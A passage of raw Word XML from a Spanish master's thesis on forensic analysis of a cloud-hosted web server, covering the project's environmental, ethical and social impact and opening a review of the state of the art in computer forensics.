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&#10;A8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d32T2nAwAA&#10;QAgAAA4AAAAAAAAAAAAAAAAAOgIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAMoW4fHD&#10;dAAAw3QAABQAAAAAAAAAAAAAAAAADQYAAGRycy9tZWRpYS9pbWFnZTEucG5nUEsBAi0AFAAGAAgA&#10;AAAhAEMNh3ngAAAACAEAAA8AAAAAAAAAAAAAAAAAAnsAAGRycy9kb3ducmV2LnhtbFBLAQItABQA&#10;BgAIAAAAIQCqJg6+vAAAACEBAAAZAAAAAAAAAAAAAAAAAA98AABkcnMvX3JlbHMvZTJvRG9jLnht&#10;bC5yZWxzUEsFBgAAAAAGAAYAfAEAAAJ9AAAAAA==&#10;">
                <v:shape id="Imagen 4" o:spid="_x0000_s1038" type="#_x0000_t75" alt="Gráfico en cascada&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:31464;height:10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769ywAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;EIXvgv9hGcGb3TSJNcRuixQFPViwingcsmM2mJ0N2W0T/71zEHqcmTfvvW+9nX2vTjTGLrCB5SID&#10;RdwE23Fr4OP96aYCFROyxT4wGfilCNvN5cUaaxsmfqPTIbVKTDjWaMClNNRax8aRx7gIA7HcvsPo&#10;Mck4ttqOOIm573WeZSvtsWNJcDjQzlHzczh6A69h9/JZlr7Iqruvx3Z/LNx+Koy5vpof7kElmtNZ&#10;/P/9bKX+7aosqjxfCoUwyQL05g8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBc1769ywAA&#10;AOMAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:imagedata r:id="rId100" o:title="Gráfico en cascada&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:33039;top:4054;width:2691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QSHzAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPyHyEhcEEvaTROUZdM0gQRcJsou3KzGawqNUyXpVv49OSDtaPv5vfetNpPrxYlC7DxrKGYK&#10;BHHjTcethsPny/0DiJiQDfaeScMvRdisr69WWBl/5g861akV2YRjhRpsSkMlZWwsOYwzPxDn29EH&#10;hymPoZUm4Dmbu16WSi2lw45zgsWBdpaan3p0GvaLr729G4/P79vFPLwdxt3yu621vr2Ztk8gEk3p&#10;Iv7/fjW5fvFYqkKV80yRmfIC5PoPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAu6UEh8wA&#10;AADjAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3B8AF1DE" w14:textId="175A8EA4" w:rsidR="00D54AC2" w:rsidRPr="00DE319F" w:rsidRDefault="00D54AC2" w:rsidP="00D54AC2">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:noProof/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>7</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="22" w:name="_Toc155782574"/>
                        <w:r w:rsidRPr="002737DD">
                          <w:t>Tareas relativas a la PEC 4 del TFM.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="22"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009F6921" w:rsidRPr="009F6921">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relativo al reto/PEC 4 se establece el siguiente diagrama.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F2AF7" w14:textId="5417465B" w:rsidR="00C356F1" w:rsidRDefault="00C356F1" w:rsidP="00C356F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Hlk154945994"/>
    </w:p>
    <w:p w14:paraId="05A09BCC" w14:textId="337EA7DA" w:rsidR="00454E29" w:rsidRDefault="00454E29" w:rsidP="00454E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc155782502"/>
      <w:r w:rsidRPr="00993D25">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00993D25">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Impacto</w:t>
      </w:r>
      <w:r w:rsidR="00B053EE">
        <w:t xml:space="preserve"> ambiental</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ético</w:t>
      </w:r>
      <w:r w:rsidR="00B053EE">
        <w:t xml:space="preserve"> y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> social.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="1FD2BE8A" w14:textId="77777777" w:rsidR="00454E29" w:rsidRDefault="00454E29" w:rsidP="00454E29"/>
    <w:p w14:paraId="42757A2B" w14:textId="25E8AAB7" w:rsidR="00454E29" w:rsidRDefault="00B053EE" w:rsidP="00454E29">
      <w:r>
        <w:t>Desde estos tres ámbitos el impacto que ha tenido o tendrá el TFM es el siguiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4751E39C" w14:textId="42194CDE" w:rsidR="00454E29" w:rsidRPr="00D66A10" w:rsidRDefault="00454E29" w:rsidP="00454E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D66A10">
        <w:t>Impacto ambiental.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F91529D" w14:textId="5E2443C1" w:rsidR="00454E29" w:rsidRPr="00D66A10" w:rsidRDefault="00B053EE" w:rsidP="00C356F1">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00454E29" w:rsidRPr="00D66A10">
        <w:t xml:space="preserve">abe destacar </w:t>
      </w:r>
      <w:r w:rsidR="005E7F53" w:rsidRPr="00D66A10">
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidR="00454E29" w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> al usar recursos informáticos, estos se generan por </w:t>
      </w:r>
      <w:r w:rsidR="00D66A10" w:rsidRPr="00D66A10">
        <w:t>energía</w:t>
      </w:r>
      <w:r w:rsidR="00454E29" w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> eléctrica y </w:t>
      </w:r>
      <w:r w:rsidR="009440E4" w:rsidRPr="00D66A10">
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidR="00454E29" w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> por tanto, si usamos de manera responsable estos recursos, podemos considerar que el impacto ambiental es nulo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007790C" w14:textId="4566B111" w:rsidR="00454E29" w:rsidRPr="00D66A10" w:rsidRDefault="00454E29" w:rsidP="00C356F1">
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve">El autor de TFM declara que la localización donde se han realizado las </w:t>
      </w:r>
      <w:r w:rsidR="00D66A10" w:rsidRPr="00D66A10">
        <w:t>investigaciones</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> y los </w:t>
      </w:r>
      <w:r w:rsidR="00D66A10" w:rsidRPr="00D66A10">
        <w:t>análisis</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> de las evidencias es </w:t>
      </w:r>
      <w:r w:rsidR="00D66A10" w:rsidRPr="00D66A10">
        <w:t>ambientalmente</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> amigable, debido a que usa places solares en su domicilio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4FC6D1" w14:textId="65F17B74" w:rsidR="00B053EE" w:rsidRPr="00D66A10" w:rsidRDefault="00B053EE" w:rsidP="00B053EE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D66A10">
        <w:t>Impacto ético.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B2A79" w14:textId="7F621038" w:rsidR="00B053EE" w:rsidRDefault="00B053EE" w:rsidP="00B053EE">
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve">No he querido realizar este apartado hasta tener una conclusión clara del asunto. Relativo a este punto, cabe destacar que una vez realizado el análisis forense al servidor web, destacar que el punto de vista ético ha sido prácticamente nulo debido a que no ha comprometido, en este caso, la confidencialidad y privacidad de las persones. Este impacto no suele tener este resultado, sobre todo cuando se analizan dispositives personales, pero en el caso que nos ocupa, un servidor alojado en un </w:t>
      </w:r>
      <w:r w:rsidR="005E7F53" w:rsidRPr="00D66A10">
        <w:t>cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> no tiene impacto ético en ese sentido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8D1A3" w14:textId="77777777" w:rsidR="00D66A10" w:rsidRPr="00D66A10" w:rsidRDefault="00454E29" w:rsidP="00454E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve">Impacto </w:t>
      </w:r>
      <w:r w:rsidR="00D66A10" w:rsidRPr="00D66A10">
        <w:t>social.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01441FFF" w14:textId="21DD7B61" w:rsidR="00D66A10" w:rsidRDefault="00D66A10" w:rsidP="00D66A10">
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve">El conocimiento de la existencia de análisis forense, su eficacia </w:t>
      </w:r>
      <w:r w:rsidR="005E7F53" w:rsidRPr="00D66A10">
        <w:t>y,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> por ende, las repercusiones que pueden sobre los </w:t>
      </w:r>
      <w:r w:rsidR="009440E4" w:rsidRPr="00D66A10">
        <w:t>actores</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009440E4" w:rsidRPr="00D66A10">
        <w:t>pueden</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66A10">
        <w:t xml:space="preserve"> ayudar a la disuasión de actividades ilícitas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550AE413" w14:textId="77777777" w:rsidR="00487731" w:rsidRDefault="00487731" w:rsidP="00D66A10"/>
    <w:p w14:paraId="3A8D7FA2" w14:textId="77777777" w:rsidR="00F21A91" w:rsidRDefault="00F21A91" w:rsidP="00D66A10"/>
    <w:p w14:paraId="5D507F2D" w14:textId="77777777" w:rsidR="00F21A91" w:rsidRPr="00D66A10" w:rsidRDefault="00F21A91" w:rsidP="00D66A10"/>
    <w:p w14:paraId="053D6BA1" w14:textId="0DE41F67" w:rsidR="00E82E18" w:rsidRDefault="00993D25" w:rsidP="00993D25">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc155782503"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="00993D25">
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00454E29">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00993D25">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00993D25">
        <w:t>Revisión del estado del arte de la informática forense.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="3ADC7863" w14:textId="77777777" w:rsidR="00C356F1" w:rsidRDefault="00C356F1" w:rsidP="00C356F1"/>
    <w:p w14:paraId="387BBA5B" w14:textId="6F5BFF47" w:rsidR="000348FB" w:rsidRPr="000348FB" w:rsidRDefault="000348FB" w:rsidP="00C356F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155733178 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XI.</w:t>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000348FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E679B0" w14:textId="0BDE81E9" w:rsidR="00E82E18" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:t>Introducción del estado del arte de la informática forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C6BB99" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El análisis forense, también llamado informática forense, computación forense, análisis forense digital o examen forense digital es la aplicación de técnicas científicas y analíticas especializadas a infraestructuras tecnológicas que permiten identificar, preservar, analizar y presentar datos válidos dentro de un proceso legal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDB314" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dichas técnicas incluyen reconstruir elementos informáticos, examinar datos residuales, autenticar datos y explicar las características técnicas del uso de datos y bienes informáticos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB4C28" w14:textId="759E1C89" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta disciplina no sólo hace uso de tecnologías de punta para mantener la </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>integridad</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Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">de los datos y del procesamiento de </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>estos</w:t>
      </w:r>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>; sino que también requiere de una especialización y conocimientos avanzados de informática y sistemas para identificar lo que ha ocurrido dentro de cualquier dispositivo electrónico. La formación de un informático forense abarca no sólo el conocimiento del software, sino también de hardware, redes, seguridad, piratería, hackeo y recuperación de información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4CB79" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La informática forense ayuda a detectar pistas sobre ataques informáticos, robos de información, conversaciones o para recolectar evidencias en correos electrónicos y chats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B40EFA1" w14:textId="34A92D3A" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
